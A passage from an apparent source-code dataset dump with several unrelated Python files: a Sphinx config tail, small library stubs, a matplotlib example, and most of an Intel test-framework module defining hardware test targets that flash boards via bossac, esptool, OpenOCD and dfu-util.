They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.napoleon\",\n \"nbsphinx\",\n \"recommonmark\",\n \"sphinx.ext.mathjax\",\n \"sphinx.ext.autosummary\",\n \"sphinx.ext.extlinks\",\n \"sphinx.ext.intersphinx\",\n \"numpydoc\",\n \"nbsphinx\",\n \"IPython.sphinxext.ipython_directive\",\n \"IPython.sphinxext.ipython_console_highlighting\",\n \"sphinxcontrib.srclinks\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = [\"_build\", \"**.ipynb_checkpoints\", \"Thumbs.db\", \".DS_Store\"]\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"pangeo\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n\n# -- nbsphinx specific options ----------------------------------------------\n# this allows notebooks to be run even if they produce errors.\nnbsphinx_allow_errors = True\n"} {"ext": "py", "sha": "1a310ec87ab9e27b22a71ab673690cc8ac515bfb", "content": "# coding=utf-8\n# Copyright 2022 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"WSC273 dataset.\"\"\"\n\nfrom tensorflow_datasets.text.wsc273.wsc273 import Wsc273\n"} {"ext": "py", "sha": "1a310f857a6be17bfe2bdc86377fd0c3a7e31ad9", "content": "from webdnn.graph.attribute import Attribute\n\n\nclass Input(Attribute):\n \"\"\"Input\n Attribute for input variable of graph\n \"\"\"\n pass\n"} {"ext": "py", "sha": "1a310f8c3a5bd83b913257ee39d720b1b8f07b5a", "content": "\"\"\"\n===============\nSubplots Adjust\n===============\n\nAdjusting the spacing of margins and subplots using\n:func:`~matplotlib.pyplot.subplots_adjust`.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\n\nplt.subplot(211)\nplt.imshow(np.random.random((100, 100)), cmap=plt.cm.BuPu_r)\nplt.subplot(212)\nplt.imshow(np.random.random((100, 100)), cmap=plt.cm.BuPu_r)\n\nplt.subplots_adjust(bottom=0.1, right=0.8, top=0.9)\ncax = plt.axes([0.85, 0.1, 0.075, 0.8])\nplt.colorbar(cax=cax)\nplt.show()\n"} {"ext": "py", "sha": "1a311019e40440aa46c857ec175ac1bb91f27758", "content": "#! 
/usr/bin/python2\n#\n# Copyright (c) 2017 Intel Corporation\n#\n# SPDX-License-Identifier: Apache-2.0\n#\n\n\nimport codecs\nimport os\nimport shutil\nimport socket\nimport string\nimport subprocess\nimport sys\nimport telnetlib\nimport tempfile\nimport time\n\nimport serial\n\nimport commonl\nimport ttbl\nimport ttbl.cm_loopback\nimport ttbl.cm_serial\nimport ttbl.config\nimport ttbl.pc_ykush\nimport ttbl.tt_qemu\n\n\nclass tt_serial(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial):\n \"\"\"A generic test target, power switched with a pluggable power\n control implementation and with one or more serial ports.\n\n Example configuration::\n\n >>> ttbl.config.target_add(\n >>> tt_serial(\n >>> \"minnow-01\",\n >>> power_control = ttbl.pc.dlwps7(\"http://URL\"),\n >>> serial_ports = [\n >>> { \"port\": \"/dev/tty-minnow-01\", \"baudrate\": 115200 }\n >>> ]),\n >>> tags = {\n >>> 'build_only': True,\n >>> 'bsp_models': { 'x86': None },\n >>> 'bsps': {\n >>> 'x86': dict(board = 'minnowboard',\n >>> console = \"\")\n >>> }\n >>> },\n >>> target_type = \"minnow_max\")\n\n With a udev configuration that generated the ``/dev/tty-minnow-01``\n name such as ``/etc/udev/rules.d/SOMETHING.rules``::\n\n SUBSYSTEM == \"tty\", ENV{ID_SERIAL_SHORT} == \"SERIALNUMBER\", \\\n GROUP = \"SOMEGROUP\", MODE = \"0660\", \\\n SYMLINK += \"tty-minnow-01\"\n\n :param power_control: an instance of an implementation\n of the power_control_mixin used to implement power control for\n the target. Use ttbl.pc.manual() for manual power control that\n requires user interaction.\n\n :param serial_ports: list of serial port dictionaries, specified\n as for :func:`serial.serial_for_url` with a couple of extras as\n specified in :class:`ttbl.cm_serial`.\n\n \"\"\"\n def __init__(self, id, power_control, serial_ports,\n _tags = None, target_type = None):\n ttbl.test_target.__init__(self, id, _tags = _tags, _type = target_type)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, serial_ports)\n\n\nclass tt_power(\n ttbl.test_target,\n ttbl.tt_power_control_mixin):\n def __init__(self, id, power_control, power = None):\n \"\"\"\n A generic test target for just power control\n\n >>> ttbl.config.target_add(\n >>> ttbl.tt.tt_power(name, ttbl.pc.dlwps7(URL), power = None),\n >>> tags = dict(idle_poweroff = 0))\n\n :param bool power: if specified, switch the power of the target\n upon initialization; *True* powers it on, *False* powers it\n off, *None* does nothing.\n\n \"\"\"\n assert isinstance(id, basestring)\n ttbl.test_target.__init__(self, id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n if power == True:\n self.log.info(\"Powering on per configuration\")\n self._power_on_do()\n elif power == False:\n self.log.info(\"Powering off per configuration\")\n self._power_off_do()\n\nclass tt_power_lc(\n ttbl.test_target,\n ttbl.cm_loopback.cm_loopback,\n ttbl.tt_power_control_mixin):\n def __init__(self, id, power_control, power = None, consoles = None):\n \"\"\"\n A generic test target for just power control and fake loopback consoles\n\n >>> ttbl.config.target_add(\n >>> ttbl.tt.tt_power(name, ttbl.pc.dlwps7(URL), power = None))\n\n :param bool power: if specified, switch the power of the target\n upon initialization; *True* powers it on, *False* powers it\n off, *None* does nothing.\n\n :param consoles: see :class:`ttbl.cm_loopback.cm_loopback`.\n\n \"\"\"\n ttbl.test_target.__init__(self, id)\n 
ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.cm_loopback.cm_loopback.__init__(self, self.state_dir, consoles)\n if power == True:\n self.log.info(\"Powering on per configuration\")\n self._power_on_do()\n elif power == False:\n self.log.info(\"Powering off per configuration\")\n self._power_off_do()\n\n\n\nclass tt_arduino2(\n ttbl.test_target,\n ttbl.test_target_images_mixin,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial):\n #: Command to call to execute the BOSSA command line flasher\n bossac_cmd = \"bossac\"\n\n def __init__(self, _id, serial_port,\n power_control = None,\n bossac_cmd = \"bossac\"):\n \"\"\"Test target for a target flashable with the bossac tool (mostly\n Arduino Due)\n\n *Requirements*\n\n - Needs a connection to the USB programming port\n\n - Uses the bossac utility built on the *arduino* branch from\n https://github.com/shumatech/BOSSA/tree/arduino; requires it\n to be installed in the path ``bossac_cmd`` (defaults to sytem\n path). Supports ``kernel{,-arm}`` images::\n\n $ git clone https://github.com/shumatech/BOSSA.git bossac.git\n $ cd bossac.git\n $ make -k\n $ sudo install -o root -g root bin/bossac /usr/local/bin\n\n - TTY devices need to be properly configured permission wise for\n bossac and serial console to work; for such, choose a Unix group\n which can get access to said devices and add udev rules such as::\n\n # Arduino2 boards: allow reading USB descriptors\n SUBSYSTEM==\"usb\", ATTR{idVendor}==\"2a03\", ATTR{idProduct}==\"003d\", \\\n GROUP=\"GROUPNAME\", MODE = \"660\"\n\n # Arduino2 boards: allow reading serial port\n SUBSYSTEM == \"tty\", ENV{ID_SERIAL_SHORT} == \"SERIALNUMBER\", \\\n GROUP = \"GROUPNAME\", MODE = \"0660\", \\\n SYMLINK += \"tty-TARGETNAME\"\n\n The theory of operation is quite simple. According to\n https://www.arduino.cc/en/Guide/ArduinoDue#toc4, the Due will\n erase the flash if you open the programming port at 1200bps\n and then start a reset process and launch the flash when you\n open the port at 115200. This is not so clear in the URL\n above, but this is what expermientation found.\n\n So for flashing, we'll take over the console, set the serial\n port to 1200bps, wait a wee bit and then call bossac.\n\n We need power control to fully reset the Arduino Due when it\n gets in a tight spot (and to save power when not using it).\n There is no reset, we just power cycle -- found no way to do a\n reset in SW without erasing the flash.\n\n :param str _id: name identifying the target\n\n :param str serial_port: File name of the device node\n representing the serial port this device is connected to.\n\n :param ttbl.tt_power_control_impl power_control: power controller\n (if any)\n\n :param bossac_cmd: Path and file where to find the `bossac`\n utility.\n\n \"\"\"\n self.serial_port = serial_port\n self.serial_port_basename = os.path.basename(serial_port)\n #:param power_url: http://USER:PASSWORD@HOST:PORT/OUTLETNUMBER\n ttbl.test_target.__init__(self, _id)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.cm_serial.cm_serial.__init__(\n self, self.state_dir,\n [\n \"pc\",\n { 'port': serial_port, 'baudrate': 115200 }\n ])\n self.bossac_cmd = bossac_cmd\n\n def image_do_set(self, image_type, image_name):\n \"\"\"Just validates the image types are ok. 
The flashing happens in\n images_do_set().\n\n :param str image_type: Type of the image supported\n :param str image_name: Name of image file in the daemon\n storage space for the user\n :raises: Any exception on failure\n\n \"\"\"\n if image_type != \"kernel\" and image_type != \"kernel-arm\":\n raise self.unsupported_image_e(\"%s: image type not supported \"\n \"(only kernel or kernel-arm)\"\n % image_type)\n self.power_on(self.owner_get())\n with self.console_takeover():\n # erase the flash by opening the serial port at 1200bps\n self.log.info(\"Erasing the flash\")\n eo = serial.Serial(port = self.serial_port, baudrate = 1200)\n time.sleep(0.25)\n eo.close()\n self.log.debug(\"Erased the flash\")\n # now write it\n cmdline = [ self.bossac_cmd,\n \"-p\", self.serial_port_basename,\n \"-e\", # Erase current\n \"-w\",\t# Write a new one\n \"-v\",\t# Verify,\n \"-b\",\t# Boot from Flash\n image_name ]\n self.log.info(\"flashing image with: %s\" % \" \".join(cmdline))\n so = commonl.logfile_open(\"bossac\", type(self), True, 0)\n s = subprocess.Popen(\n cmdline, stdin = None, cwd = \"/tmp\",\n stdout = so, stderr = subprocess.STDOUT)\n self.log.info(\"running %s\" % (\" \".join(cmdline)))\n r = s.wait()\n del s\n\n so.seek(0)\n # Say what happened\n if r != 0:\n self.log.error(\"flashing failed\")\n m = \"\"\n with codecs.open(so.name, \"r\", encoding = 'utf-8') as so_r:\n for line in so_r:\n line = line.decode('utf-8').strip()\n self.log.error(\"flashing output: \" + line)\n m += \"flashing output: \" + line + \"\\n\"\n raise Exception(\"Flashing failed\\n\" + m)\n # Check the log, if it does not say \"Verify succesful\", it didn't work\n with codecs.open(so.name, \"r\", encoding = 'utf-8') as so_r:\n m = \"\"\n for line in so_r:\n line = line.decode('utf-8').strip()\n if line.endswith(\"Verify successful\"):\n break\n m += \"flashing output: \" + line + \"\\n\"\n else:\n raise Exception(\n \"Flashing failed (can't find 'Verify syccessful')\\n\" + m)\n self.log.info(\"flashing succeeded\")\n with codecs.open(so.name, \"r\", encoding = 'utf-8') as so_r:\n for line in so_r:\n line = line.strip()\n self.log.debug(\"flashing: \" + line)\n\n def images_do_set(self, images):\n pass\n\n\nclass tt_esp32(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial,\n ttbl.test_target_images_mixin):\n\n esptool_path = \"__unconfigured__tt_esp32.esptool_path__\"\n\n def __init__(self, _id, serial_number,\n power_control, serial_port):\n \"\"\"\\\n Test target ESP32 Tensilica based MCUs that use the ESP-IDF framework\n\n :param str _id: name identifying the target\n\n :param str serial_number: Unique USB serial number of the device (can\n be updated with http://cp210x-program.sourceforge.net/)\n\n :param power_control: Power control implementation or rail\n (:class:`ttbl.tt_power_control_impl` or list of such)\n\n :param str serial_port: Device name of the serial port where\n the console will be found. This can be set with udev to be a\n constant name.\n\n The base code will convert the *ELF* image to the required\n *bin* image using the ``esptool.py`` script. Then it will\n flash it via the serial port.\n\n *Requirements*\n\n - The ESP-IDK framework, of which ``esptool.py`` is used to\n flash the target; to install::\n\n $ cd /opt\n $ git clone --recursive https://github.com/espressif/esp-idf.git\n\n (note the ``--recursive``!! 
it is needed so all the\n submodules are picked up)\n\n configure path to it globally by setting\n :attr:`esptool_path` in a /etc/ttbd-production/conf_*.py file:\n\n .. code-block:: python\n\n import ttbl.tt\n ttbl.tt.tt_esp32.esptool_path = \"/opt/esp-idf/components/esptool_py/esptool/esptool.py\"\n\n Note you will also most likely need this in the client to\n compile code for the board.\n\n - Permissions to use USB devices in */dev/bus/usb* are needed;\n *ttbd* usually roots with group *root*, which shall be\n enough.\n\n - Needs power control for proper operation; FIXME: pending to\n make it operate without power control, using ``esptool.py``.\n \"\"\"\n assert isinstance(_id, basestring)\n assert isinstance(serial_number, basestring)\n assert isinstance(power_control, ttbl.tt_power_control_impl) \\\n or isinstance(power_control, list)\n\n self.serial_number = serial_number\n\n ttbl.test_target.__init__(self, _id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.test_target_images_mixin.__init__(self)\n self.serial_port = serial_port\n ttbl.cm_serial.cm_serial.__init__(\n self, self.state_dir,\n [\n \"pc\",\n { 'port': serial_port, 'baudrate': 115200 }\n ])\n\n def images_do_set(self, images):\n # We implement image_do_set(), as there is only one image to set\n pass\n\n\n def image_do_set(self, image_type, image_name):\n \"\"\"Just validates the image types are ok. The flashing happens in\n images_do_set().\n\n :param str image_type: Type of the image supported\n :param str image_name: Name of image file in the daemon\n storage space for the user\n :raises: Any exception on failure\n\n \"\"\"\n cmdline_convert = [\n self.esptool_path,\n \"--chip\", \"esp32\",\n \"elf2image\",\n ]\n cmdline_flash = [\n self.esptool_path,\n \"--chip\", \"esp32\",\n \"--port\", self.serial_port,\n \"--baud\", \"921600\",\n \"--before\", \"default_reset\",\n \"write_flash\", \"-u\",\n \"--flash_mode\", \"dio\",\n \"--flash_freq\", \"40m\",\n \"--flash_size\", \"detect\",\n \"0x1000\",\n ]\n\n if image_type == \"kernel\":\n image_type = \"kernel-xternsa\"\n if not image_type.startswith(\"kernel-\"):\n raise RuntimeError(\n \"Unknown image type '%s' (valid: kernel-{%s})\"\n % (image_type, \",\".join(self.tags['bsps'].keys())))\n image_name_bin = image_name + \".bin\"\n try:\n cmdline = cmdline_convert + [ image_name,\n \"--output\", image_name_bin ]\n self.log.info(\"converting with %s\" % \" \".join(cmdline))\n s = subprocess.check_output(cmdline, cwd = \"/tmp\",\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"converting image with %s failed: (%d) %s\"\n % (\" \".join(cmdline), e.returncode, e.output))\n raise\n\n self._power_cycle_do()\n with self.console_takeover():\t# give up the serial port\n try:\n cmdline = cmdline_flash + [ image_name_bin ]\n self.log.info(\"flashing with %s\" % \" \".join(cmdline))\n s = subprocess.check_output(cmdline, cwd = \"/tmp\",\n stderr = subprocess.STDOUT)\n self.log.info(\"flashed with %s: %s\" % (\" \".join(cmdline), s))\n except subprocess.CalledProcessError as e:\n self.log.error(\"flashing with %s failed: (%d) %s\"\n % (\" \".join(cmdline), e.returncode, e.output))\n raise\n self._power_off_do()\n self.log.info(\"flashing succeeded\")\n\n\nclass tt_flasher(\n ttbl.test_target,\n ttbl.test_target_images_mixin,\n ttbl.tt_power_control_mixin,\n ttbl.tt_debug_mixin,\n ttbl.cm_serial.cm_serial):\n\n class error(RuntimeError):\n pass\n\n def __init__(self, _id, serial_ports,\n flasher, power_control):\n 
\"\"\"Test target flashable, power switchable with debuggin\n\n Any target which supports the :class:`ttbl.flasher.flasher_c`\n interface can be used, mostly OpenOCD targets.\n\n How we use this, is for example:\n\n >>> flasher_openocd = ttbl.flasher.openocd_c(\"frdm_k64f\", FRDM_SERIAL,\n >>> openocd10_path, openocd10_scripts)\n >>> ttbl.config.target_add(\n >>> ttbl.tt.tt_flasher(\n >>> NAME,\n >>> serial_ports = [\n >>> \"pc\",\n >>> dict(port = \"/dev/tty-NAME\", baudrate = 115200)\n >>> ],\n >>> flasher = flasher_obj,\n >>> power_control = [\n >>> ttbl.pc_ykush.ykush(YKUSH_SERIAL, YKUSH_PORT)\n >>> # delay until device comes up\n >>> ttbl.pc.delay_til_usb_device(FRDM_SERIAL),\n >>> ttbl.cm_serial.pc(),\t# Connect serial ports\n >>> flasher_openocd, # Start / stop OpenOCD\n >>> ]\n >>> ),\n >>> tags = {\n >>> 'bsp_models' : { 'arm': None },\n >>> 'bsps' : {\n >>> \"arm\": dict(board = \"frdm_k64f\", kernelname = 'zephyr.bin',\n >>> kernel = [ \"micro\", \"nano\" ],\n >>> console = \"\", quark_se_stub = \"no\"),\n >>> },\n >>> 'slow_flash_factor': 5,\t# Flash verification slow\n >>> 'flash_verify': 'False', # Or disable it ...\n >>> },\n >>> target_type = \"frdm_k64f\")\n\n .. note: the power for this target is a normal power control\n implementation, HOWEVER, the power rail also contains\n the OpenOCD flasher to start/stop the daemon once the\n board is powered up.\n\n :param str _id: target name\n\n :param serial_ports: list of serial port dictionaries,\n specified as for :func:`serial.serial_for_url` with a couple\n of extras as specified in :class:`ttbl.cm_serial`.\n\n :param ttbl.flasher.flasher_c flasher: flashing object that\n provides access to deploy images and debug control\n\n :param power_control: an instance of an implementation\n of the power_control_mixin used to implement power control for\n the target. 
Use ttbl.pc.manual() for manual power control that\n requires user interaction.\n\n \"\"\"\n ttbl.test_target.__init__(self, _id)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.tt_debug_mixin.__init__(self)\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, serial_ports)\n self.flasher = flasher\n self.flasher.test_target_link(self)\n self.power_on_post_fns.append(self.power_on_do_post)\n self.power_off_pre_fns.append(self.power_off_do_pre)\n\n # Debugging interface\n #\n # We don't do much other than resuming the target if we stop\n # debugging\n def debug_do_start(self, tt_ignored):\n pass\n\n def debug_do_halt(self, _):\n if self.flasher:\n self.flasher.target_halt(for_what = \"debug_halt\")\n\n def debug_do_reset(self, _):\n if self.flasher:\n self.flasher.target_reset_halt(for_what = \"debug_reset\")\n\n def debug_do_reset_halt(self, _):\n if self.flasher:\n self.flasher.target_reset_halt(for_what = \"debug_reset_halt\")\n\n def debug_do_resume(self, _):\n if self.flasher:\n self.flasher.target_resume(for_what = \"debug_resume\")\n\n def debug_do_stop(self, _):\n if self.flasher:\n self.flasher.target_resume()\n\n def debug_do_info(self, _):\n # FIXME: self.flasher should be providing this information, this\n # is breaking segmentation\n count = 2 # port #0 is for telnet, #1 for TCL\n tcp_port_base_s = self.fsdb.get(\"openocd.port\")\n if tcp_port_base_s == None:\n return \"Debugging information not available, power on?\"\n tcp_port_base = int(tcp_port_base_s)\n s = \"OpenOCD telnet server: %s %d\\n\" \\\n % (socket.getfqdn('0.0.0.0'), tcp_port_base)\n for target in self.flasher.board['targets']:\n s += \"GDB server: %s: tcp:%s:%d\\n\" % (target,\n socket.getfqdn('0.0.0.0'),\n tcp_port_base + count)\n count +=1\n if self.fsdb.get('powered') != None:\n s += \"Debugging available as target is ON\"\n else:\n s += \"Debugging not available as target is OFF\"\n return s\n\n def debug_do_openocd(self, _, command):\n return self.flasher.openocd_cmd(command)\n\n # Wrap actual reset with retries\n def target_reset_halt(self, for_what = \"\"):\n tries = 1\n tries_max = 2\n # FIXME: current limitation, can't access the tags from the\n # constructor as the ones we add in target_add() aren't there\n # yet.\n wait = \\\n float(self.tags.get('hard_recover_rest_time', 2))\n while tries <= tries_max:\n # The Arduino101 get's so stuck sometimes\n try:\n self.flasher.target_reset_halt(for_what)\n break\n except self.flasher.error:\n pass\n try_s = \"%d/%d\" % (tries, tries_max)\n time.sleep(2)\n try:\n self.flasher.target_reset(\"[recover reset #1 %s] \" % try_s\n + for_what)\n except self.flasher.error:\n pass\n try:\n self.flasher.target_reset_halt(\"[retry %s] \" % try_s\n + for_what)\n break\n except self.flasher.error:\n pass\n # In some targets, this fails because maybe we just\n # power-cycled and the JTAG said it was ready but it\n # is really not ready...when that happens, just\n # power-cycle again.\n # well, that didn't work either; bring the big guns,\n # power cycle it and try the whole thing again\n wait_s = (1 + 2.0 * tries/tries_max) * wait\n self.log.info(\"Failed to reset/halt, power-cycle (%.2fs) \"\n \"and retrying (try %d/%d)\"\n % (wait_s, tries, tries_max))\n self.power_cycle(self.owner_get(), wait_s)\n tries += 1\n else:\n # FIXME: pass the exception we get or the log or something\n raise self.error(\"Can't reset/halt the target\")\n\n def target_reset(self, for_what = \"\"):\n tries = 1\n tries_max = 5\n # 
FIXME: current limitation, can't access the tags from the\n # constructor as the ones we add in target_add() aren't there\n # yet.\n wait = \\\n float(self.tags.get('hard_recover_rest_time', 10))\n while tries <= tries_max:\n # The Arduino101 get's so stuck sometimes\n try:\n self.flasher.target_reset(for_what)\n break\n except self.flasher.error:\n pass\n # Try again\n try:\n self.flasher.target_reset(for_what)\n break\n except self.flasher.error:\n pass\n # Bring the big guns, power cycle it\n if wait != None:\n wait_s = tries * wait\n self.log.info(\"Failed to reset/run, power-cycle (%.2fs) \"\n \"and retrying (try %d/%d)\"\n % (wait_s, tries, tries_max))\n self.power_cycle(self.owner_get(), wait_s)\n tries += 1\n else:\n # FIXME: pass the exception we get or the log or something\n raise self.error(\"Can't reset/run the target\")\n\n # Power interface\n #\n # Fire up the flasher when we power the target up, so it can\n # access the JTAG\n\n\n def power_on_do_post(self):\n self.flasher.start()\n\n def power_off_do_pre(self):\n self.flasher.stop()\n\n def reset_do(self, _):\n # We halt first so we can stop recording from the serial ports\n # and then restart wihout getting any trash; we use reset_halt\n # because it is a single command for all targets (halt needs\n # to select each target).\n self.flasher.target_reset_halt()\n self.consoles_reset()\n # When we reset, if we are debugging we need to halt the target as\n # soon as it starts. Otherwise, we reset it normally. These\n # are atomic (they act on all the targets at the same time..in\n # theory)\n if self.fsdb.get(\"debug\") != None:\n self.flasher.target_reset_halt()\n else:\n self.flasher.target_reset()\n\n # Flashing interface -- quite simple, we need the target on and\n # then just flash the image in.\n def image_do_set(self, image_type, image_name):\n pass\n\n def images_do_set(self, images):\n # FIXME: current limitation, can't access the tags from the\n # constructor as the ones we add in target_add() aren't there\n # yet.\n wait = \\\n float(self.tags.get('hard_recover_rest_time', 10))\n if self.fsdb.get(\"disable_power_cycle_before_flash\") != 'True':\n # Make sure the target is really fresh before flashing it\n try:\n # See the documentation for this on class flasher_c\n # for why we have to do it.\n self.flasher.hack_reset_after_power_on = True\n self.power_cycle(self.owner_get(), wait = wait)\n finally:\n self.flasher.hack_reset_after_power_on = False\n self.log.info(\"sleeping 2s after power cycle\")\n # HACK: For whatever the reason, we need to sleep before\n # resetting/halt, seems some of the targets are not ready\n # inmediately after\n time.sleep(2)\n self.target_reset_halt(for_what = \"for image flashing\")\n timeout_factor = self.tags.get('slow_flash_factor', 1)\n verify = self.tags.get('flash_verify', 'True') == 'True'\n # FIXME: replace this check for verifying which image types\n # the flasher supports\n for t, n in images.iteritems():\n if t == \"kernel-x86\":\n it = \"x86\"\n elif t == \"kernel\":\n it = \"x86\"\n elif t == \"kernel-arc\":\n it = \"arc\"\n elif t == \"kernel-arm\":\n it = \"arm\"\n elif t == \"rom\":\n it = \"rom\"\n elif t == \"bootloader\":\n it = \"bootloader\"\n else:\n raise self.unsupported_image_e(\n \"%s: Unknown image type (expected \"\n \"kernel|kernel-(x86,arc,arm), rom)\"\n % t)\n try:\n self.flasher.image_write(it, n, timeout_factor, verify)\n except ValueError as e:\n self.log.exception(\"flashing got exception: %s\", e)\n raise self.unsupported_image_e(e.message)\n\nclass 
tt_dfu(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial,\n ttbl.test_target_images_mixin):\n\n def __init__(self, _id, serial_number,\n power_control, power_control_board,\n serial_ports = None):\n \"\"\"Test target for a flashable with DFU Utils\n\n *Requirements*\n\n - Needs a connection to the USB port that exposes a DFU\n interface upon boot\n\n - Uses the dfu-utils utility, available for most (if not all)\n Linux distributions\n\n - Permissions to use USB devices in */dev/bus/usb* are needed;\n *ttbd* usually roots with group *root*, which shall be\n enough.\n\n - Needs power control for proper operation\n\n :param str _id: name identifying the target\n\n :param power_control: Power control implementation or rail\n (:class:`ttbl.tt_power_control_impl` or list of such)\n\n :param ttbl.tt_power_control_impl power_control: power controller\n *just* for the board--this is the component in the power\n control rail that controls the board only (versus other\n parts such as serial ports or pseudo-power-controllers that\n wait for the USB device to pop up.\n\n Note the tags to the target must include, on each supported\n BSP, a tag named *dfu_interface_name* listing the name of the\n *altsetting* of the DFU interface to which the image for said\n BSP needs to be flashed.\n\n This can be found, when the device exposes the DFU interfaces\n with the *lsusb -v* command; for example, for a tinyTILE\n (output summarized for clarity)::\n\n $ lsusb -v\n ...\n Bus 002 Device 110: ID 8087:0aba Intel Corp.\n Device Descriptor:\n bLength 18\n bDescriptorType 1\n ...\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update...\n iInterface 4 x86_rom\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update...\n iInterface 5 x86_boot\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 6 x86_app\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 7 config\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 8 panic\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 9 events\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 10 logs\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 11 sensor_core\n Interface Descriptor:\n bInterfaceClass 254 Application Specific Interface\n bInterfaceSubClass 1 Device Firmware Update\n iInterface 12 ble_core\n\n In this case, the three cores available are x86 (x86_app), arc\n (sensor_core) and ARM (ble_core).\n\n *Example*\n\n A Tiny Tile can be connected, without exposing a serial console:\n\n >>> pc_board = ttbl.pc_ykush.ykush(\"YK22909\", 1)\n >>>\n >>> ttbl.config.target_add(\n >>> tt_dfu(\"ti-01\",\n >>> serial_number = \"5614010001031629\",\n >>> power_control = [\n >>> pc_board,\n >>> ttbl.pc.delay_til_usb_device(\"5614010001031629\"),\n >>> ],\n >>> power_control_board = pc_board),\n >>> tags = {\n >>> 'bsp_models': { 'x86+arc': ['x86', 'arc'], 'x86': None, 'arc': None},\n >>> 'bsps' : {\n >>> \"x86\": 
dict(zephyr_board = \"tinytile\",\n >>> zephyr_kernelname = 'zephyr.bin',\n >>> dfu_interface_name = \"x86_app\",\n >>> console = \"\"),\n >>> \"arm\": dict(zephyr_board = \"arduino_101_ble\",\n >>> zephyr_kernelname = 'zephyr.bin',\n >>> dfu_interface_name = \"ble_core\",\n >>> console = \"\"),\n >>> \"arc\": dict(zephyr_board = \"arduino_101_sss\",\n >>> zephyr_kernelname = 'zephyr.bin',\n >>> dfu_interface_name = 'sensor_core',\n >>> console = \"\")\n >>> },\n >>>\n >>> },\n >>> target_type = \"tile\"\n >>> )\n\n \"\"\"\n assert isinstance(_id, basestring)\n assert isinstance(serial_number, basestring)\n assert isinstance(power_control, ttbl.tt_power_control_impl) \\\n or isinstance(power_control, list)\n\n self.serial_number = serial_number\n self.pc_board = power_control_board\n self.pc_usb = ttbl.pc.delay_til_usb_device(serial_number)\n\n ttbl.test_target.__init__(self, _id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, serial_ports)\n\n def images_do_set(self, images):\n \"\"\"Just validates the image types are ok. The flashing happens in\n images_do_set().\n\n :param str image_type: Type of the image supported\n :param str image_name: Name of image file in the daemon\n storage space for the user\n :raises: Any exception on failure\n\n \"\"\"\n\n # Power cycle the board so it goes into DFU mode; it then\n # stays there for five seconds\n self.pc_board.power_cycle_raw(self, 5)\n self.pc_usb.power_on_do(self)\n\n cmdline = [\n \"/usr/bin/dfu-util\",\n \"-S\", self.serial_number\n ]\n for image_type, image_name in images.iteritems():\n if image_type == \"kernel\":\n image_type = \"kernel-x86\"\n if not image_type.startswith(\"kernel-\"):\n raise RuntimeError(\n \"Unknown image type '%s' (valid: kernel-{%s})\"\n % (image_type, \",\".join(self.tags['bsps'].keys())))\n bsp = image_type[len(\"kernel-\"):]\n tags_bsp = self.tags.get('bsps', {}).get(bsp, None)\n if tags_bsp == None:\n raise RuntimeError(\n \"Unknown BSP %s from image type '%s' (valid: %s)\"\n % (bsp, image_type, \" \".join(self.tags['bsps'].keys())))\n dfu_if_name = tags_bsp.get('dfu_interface_name', None)\n if dfu_if_name == None:\n raise RuntimeError(\n \"Misconfigured target: image type %s (BSP %s) has \"\n \"no 'dfu_interface_name' key to indicate which DFU \"\n \"interface shall it flash\"\n % (image_type, bsp))\n # now write it\n cmdline += [\n \"-a\", dfu_if_name,\n \"-D\", image_name,\n ]\n try:\n self.log.info(\"flashing with %s\" % 